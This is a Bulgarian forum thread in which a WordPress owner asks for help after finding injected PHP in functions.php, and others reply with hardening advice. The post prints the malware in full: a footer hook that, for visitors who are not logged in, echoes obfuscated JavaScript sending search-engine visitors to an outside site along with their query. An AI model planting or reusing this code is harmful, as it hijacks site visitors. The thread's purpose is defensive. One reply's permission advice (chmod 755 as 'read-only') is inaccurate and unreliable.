Заразен functions.php на Wordpress

chefo

Member
Здравейте,
Имам следния проблем с Wordpress блог, вкаран ми е някакъв php код във functions.php:


Код:
<?php
add_action('get_footer', 'add_sscounter');
       function add_sscounter(){
               echo '<!--scounter-->';
               if(function_exists('is_user_logged_in')){
                       if(time()%2 == 0 && !is_user_logged_in()){
                               echo "<script
language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e
r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                       }
               }
       }
?>

който редиректва влизанията от търсачките към някакъв сайт- googosearch.biz . Махам кода 2-3 пъти и пак го вмъква някой след няколко дена. Как да защитя сайта за да няма достъп до functions.php? Някакви идеи?
 
От: Заразен functions.php на Wordpress

wordpress ъпдейт-нат ли е до последната версия?

като за начало промени правата на functions.php само за четене от групата и апаче, само owner-a да може да го променя

chmod 755

След това си смени всички пароли и ъпдейт-ни wordpress до най-новата версия ако не си, както и всички плъгини, които използваш
 
От: Заразен functions.php на Wordpress

А има ли смисъл да слагам някакви допълнителни security плъгини от сорта на Askapache-password-protect, Bulletproof-security, Better-wp-security или др. подобни?
 

Горе